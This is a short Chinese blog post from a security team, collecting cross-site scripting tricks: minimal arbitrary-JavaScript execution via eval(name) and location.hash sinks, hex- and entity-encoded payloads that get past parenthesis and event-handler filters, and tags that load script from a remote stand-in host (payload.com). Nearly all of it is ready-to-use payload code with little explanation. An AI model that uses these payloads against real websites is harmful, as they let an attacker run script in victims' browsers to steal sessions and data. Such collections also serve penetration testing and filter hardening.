香香的xss小记录

Posted ChaMd5安全团队

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了香香的xss小记录相关的知识,希望对你有一定的参考价值。

0x00 前言

总结的一些xss的技巧(可能会持续更新),愿大佬勿喷,还有什么方法,大佬记得分享啊。有什么看不惯的错误请在本文留言,谢谢。


0x01 我认为最短的执行任意js代码

eval(name);

poc:

<iframe src='http://localhost/?xss=eval(name);' name='js-code'>


0x02 类似eval的方法

setTimeout(location.hash.slice(1))

setInterval(location.hash.slice(1))

Function(location.hash.slice(1))(1)

jQuery.globalEval(location.hash.slice(1))

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

document.getElementById('xx').innerhtml=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`


0x03 当括号被过滤执行任意payload的方法

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

<svg/onload="location='javascript:/*'%2blocation.hash">
锚点后接*/jscode


0x04 事件被过滤时执行任意payload

<link rel=import href=\\payload.com>

<script src=\\payload.com></script>

<iframe srcdoc="&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x29;&#x3E;"></iframe>



欢迎各位大牛指点   欢迎各位大牛投稿

关于文章的建议和意见都可以留言告诉我们呢

(撒花)

投稿至:admin@chamd5.org


ChaMd5的小八卦全在这里哟~比心❤



................ChaMd5安全团队................

悄悄的告诉你

关注会有小惊喜

以上是关于香香的xss小记录的主要内容,如果未能解决你的问题,请参考以下文章

工作小记录

java学习中,匿名函数构造方法构造代码块构造方法中调用构造方法(java 学习中的小记录)

关于学习戴工的《单片机入门到精通》的小记录

小记录arm64下的原子加

小记录:flask的DEBUG开关

Angularjs中UI Router用法小记录